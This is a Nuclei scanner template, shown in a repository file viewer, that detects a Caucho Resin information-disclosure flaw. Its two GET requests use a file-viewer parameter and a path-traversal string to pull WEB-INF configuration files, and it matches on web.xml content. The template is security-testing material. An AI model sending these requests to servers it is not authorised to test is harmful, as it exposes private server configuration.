nuclei-templates/vulnerabilities/other/caucho-resin-info-disclosur...

29 lines
629 B
YAML
Raw Normal View History

2021-02-01 17:32:39 +00:00
id: caucho-resin-info-disclosure
info:
name: Caucho Resin Information Disclosure
author: pikpikcu
severity: info
reference:
- https://www.exploit-db.com/exploits/27888
tags: exposure,resin,caucho,edb
requests:
- method: GET
path:
2021-08-19 17:41:29 +00:00
- "{{BaseURL}}/resin-doc/viewfile/?file=/WEB-INF/resin-web.xml" # Version: 3.0.17/3.0.18
- "{{BaseURL}}/%20../web-inf/web.xml" # Version: 3.1.1
2021-08-19 17:41:29 +00:00
matchers-condition: and
matchers:
- type: word
words:
- "<web-app"
- "</web-app>"
part: body
2021-08-19 17:41:29 +00:00
condition: and
- type: status
status:
- 200